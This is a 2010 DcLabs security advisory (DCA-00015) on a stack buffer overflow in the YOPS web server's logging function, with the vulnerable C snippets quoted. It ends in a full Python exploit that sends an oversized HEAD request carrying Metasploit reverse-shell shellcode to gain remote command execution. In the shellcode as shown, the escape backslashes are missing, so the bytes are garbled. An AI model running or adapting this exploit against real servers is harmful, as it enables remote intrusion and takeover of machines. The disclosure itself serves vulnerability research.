DCA-00015.txt
Posted on 12 September 2010
[DCA-00015] [Software] - YOPS (Your Open Personal [WEB] Server) [Vendor Product Description] - YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP server for Linux OS written in C. There are 7 stages (accept, parse, launch, fetch, error, send and log), and pipes are used as interstage channels. [Bug Description] - In function http_parse_request_header the application fails to do a boundary check for a malformed buffer received as a HTTP command (HEAD/GET/POST), prior to use it as input for logger variable at swebs_record_log function. --- http.c snippet --- int http_parse_request_header(char *data, struct http_request_header *h) { int r; int ver, rev; char *s, *tok, *l, *prm; [...] r = sscanf(h->http, " HTTP/%d.%d ", &ver, &rev); if (r != 2) return -400; [...] } --- END snippet --- --- swebs.c snippet --- int swebs_record_log(int log, JOB *job) { int err; time_t now; char timestr[32]; char logrec[MAX_REQUEST_LINE_LEN + 1]; [...] sprintf ( logrec, "%s [%s] "%s" (%d+%d/%d) %d", job->client, timestr, job->hdr.request_line, job->response_hlen, job->response_blen_sent, job->response_blen, job->status ); [...] } --- END snippet --- [History] - Advisory sent to vendor on 08/26/2010 [Impact] - High (Remote Command Execution) [Affected Version] - YOPS 2009-11-30 - Prior versions may also be vulnerable [Code] #!/usr/bin/python # Software: # YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP server for Linux OS written in C. # URL: http://sourceforge.net/projects/yops2009/ # # Vulnerability: Rodrigo Escobar aka ipax @ DcLabs # Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs # Contact: waKKu <AT> dclabs <DOT> com <DOT> br HOST = "localhost" PORT = 8888 import socket import sys import time try: BUFF_LEN = int(sys.argv[1]) except: BUFF_LEN = 802 FIXUP_ADDR = "x47xcex04x08" shellcode = ( # MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444 "x33xc9xb1x13xbexaex88x55xcbxdaxcdxd9x74x24xf4" "x5fx31x77x0ex03x77x0ex83x69x8cxb7x3ex44x56xc0" "x22xf5x2bx7cxcfxfbx22x63xbfx9dxf9xe4x9bx3fx6a" "x9ax1bxbfx6bx02x74xaex37xacxd7xbaxd7x61x88xb3" "x39xc2x42xa5xe1x08x12x70x95x4axa3xbdx54xecx8d" "xb8x9fxbdx65x15x4fx4dx1ex01xa0xd3xb7xbfx37xf0" "x18x6cxc1x16x28x99x1cx58x43" ) buffer = "HEAD " buffer += "A"*BUFF_LEN buffer += FIXUP_ADDR*4 buffer += " HTTP/1.1" stackadjust = ( "xcb" # instruction alignment "xbcx69x69x96xb0" # Stack Adjustment ) payload = buffer + stackadjust + shellcode + " " print """ ###################################### ### DcLabs Security Research Group ### ### +Exploit+ ### ###################################### Software: YOPS 2009 - Web Server --- Vulnerability by: ipax Exploit by: waKKu Greetings to: All DcLabs members """ print " [+] Using BUFF_LEN -> ", str(BUFF_LEN) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print " [+] Trying to establish connection..." s.connect((HOST, PORT)) print " [+] Sending a dummy request to initialize data..." s.send("HEAD DcLabs HTTP/1.1 ") try: s.recv(1024) except: pass s.close() time.sleep(3) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) print " [+] Sending our malicious payload..." s.send(payload) print " [+] Payload sent, good luck!" s.close() -- Rodrigo Escobar (ipax) Pentester/Researcher Security Team @ DcLabs http://www.dclabs.com.br
